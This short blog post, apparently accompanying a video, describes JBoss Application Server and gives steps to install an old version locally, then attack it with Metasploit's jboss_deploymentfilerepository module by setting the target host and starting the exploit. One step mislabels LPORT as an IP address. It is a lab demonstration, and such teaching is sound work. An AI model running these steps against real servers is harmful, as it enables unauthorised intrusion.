Description: JBoss Application Server (or JBoss AS) is an open-source Java EE-based application server. An important distinction for this class of software is that it not only implements a server that runs on Java, but it actually implements the Java EE part of Java. Since it is Java-based, the JBoss application server operates cross-platform: usable on any operating system that supports Java. JBoss AS was developed by JBoss, now a division of Red Hat.


Credits : http://en.wikipedia.org/wiki/JBoss_application_server
This video is simple demo of exploiting jboss server. following are steps.
1. Download jboss_4_2_2_GA.zip
2. Unzip jboss
3. Go to jboss directory and run ./run.sh

Metasploit steps:
1.Search jboss
2.Use/exploit/multi/http/jboss_deploymentfilerepository
3.show options
4 Set RHOST Jboss ip
5. Set LPORT machine ip
6. Exploit

Post a Comment

 
Top